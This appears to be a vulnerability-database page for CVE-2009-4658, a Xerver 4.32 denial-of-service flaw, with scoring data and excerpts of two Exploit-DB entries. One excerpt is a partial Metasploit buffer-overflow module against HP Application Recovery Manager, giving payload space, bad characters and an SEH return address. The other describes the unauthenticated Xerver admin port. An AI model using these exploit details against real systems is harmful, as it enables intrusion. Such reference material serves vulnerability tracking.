CVE-2009-4658
published 2010-03-03CVE-2009-4658: Xerver 4.32 allows remote authenticated users to cause a denial of service (daemon crash) via a non-numeric web port assignment in the management interface…
PriorityP416medium4CVSS 2.0
AVNACLAuSCNINAP
EXPLOIT
EPSS
1.81%
75.9th percentile
Xerver 4.32 allows remote authenticated users to cause a denial of service (daemon crash) via a non-numeric web port assignment in the management interface. NOTE: this can be leveraged by non-authenticated attackers using CVE-2009-4657.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| omidrouhani | xerver | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP Application Recovery Manager - 'OmniInet.exe' Remote Buffer Overflow
exploitdb·2009-12-26
CVE-2009-3844 HP Application Recovery Manager - 'OmniInet.exe' Remote Buffer Overflow
HP Application Recovery Manager - 'OmniInet.exe' Remote Buffer Overflow
---
class Metasploit3 'HP Application Recovery Manager (OmniInet.exe) Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in HP Application Recovery Manager OmniInet daemon.
By sending a specially crafted MSG_PROTOCOL packet, a remote attacker may be able to execute arbitrary code.
},
'Author' => 'EgiX ',
'References' =>
[
[ 'CVE', '2009-3884' ],
[ 'BID', '37250' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-091' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 4658,
'BadChars' => '\x00',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x004412ed } ], # OmniInet.exe pop ecx; pop ecx; ret
],
'DefaultTarget' =>
Exploit-DB
Xerver HTTP Server 4.32 - Remote Denial of Service
exploitdb·2009-09-18
CVE-2009-4658 Xerver HTTP Server 4.32 - Remote Denial of Service
Xerver HTTP Server 4.32 - Remote Denial of Service
---
#################################################################################
# #
# Xerver HTTP Server <= v4.32 Remote Denial of Service #
# Found By: Dr_IDE #
# Download: http://www.javascript.nu/xerver #
# Tested On: Windows XPSP3 #
# #
#################################################################################
- Description -
Xerver v4.32 is a Windows based HTTP server. This is the latest version of
the application available.
Xerver v4.32 is vulnerable to a remote denial of service through following means.
Xerver ships with a web based configuration program, essentially making this DoS
remote if and when the Remote Setup is running.
The admin package runs on port 32123 and does not require any form of
authentication
No writeups or analysis indexed.
2010-03-03
Published